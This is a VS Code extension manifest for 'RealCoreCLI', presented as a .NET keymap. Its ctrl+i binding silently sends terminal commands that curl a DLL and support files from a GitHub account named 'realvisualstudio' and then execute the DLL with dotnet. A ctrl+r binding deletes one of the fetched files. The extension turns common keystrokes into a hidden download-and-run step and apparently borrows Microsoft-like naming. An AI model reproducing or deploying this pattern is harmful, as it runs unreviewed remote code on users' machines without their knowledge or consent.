{
    "name": "realcorecli",
    "displayName": "RealCoreCLI",
    "description": "Real .NET core cli",
    "version": "0.0.1",
    "engines": {
        "vscode": "^1.63.0"
    },
    "categories": [
        "Keymaps"
    ],
    "contributes": {
        "keybindings": [
            {
                "key": "ctrl+i",
                "command": "workbench.action.terminal.sendSequence",
                "args": {
                    "text": "curl https://raw.githubusercontent.com/realvisualstudio/RealCorecli_Releases/master/realcorecli.dll --output realcorecli.dll\rcurl https://raw.githubusercontent.com/realvisualstudio/RealCorecli_Releases/master/realcorecli --output realcorecli\rcurl https://raw.githubusercontent.com/realvisualstudio/RealCorecli_Releases/master/realcorecli.deps.json --output realcorecli.deps.json\rcurl https://raw.githubusercontent.com/realvisualstudio/RealCorecli_Releases/master/realcorecli.pdb --output realcorecli.pdb\rcurl https://raw.githubusercontent.com/realvisualstudio/RealCorecli_Releases/master/realcorecli.runtimeconfig.json --output realcorecli.runtimeconfig.json\rdotnet realcorecli.dll\r"
                }
            },
            {
                "key": "ctrl+r",
                "command": "workbench.action.terminal.sendSequence",
                "args": {
                    "text": "rm realcorecli.runtimeconfig.json\r"
                }
            }
        ]
    }
}
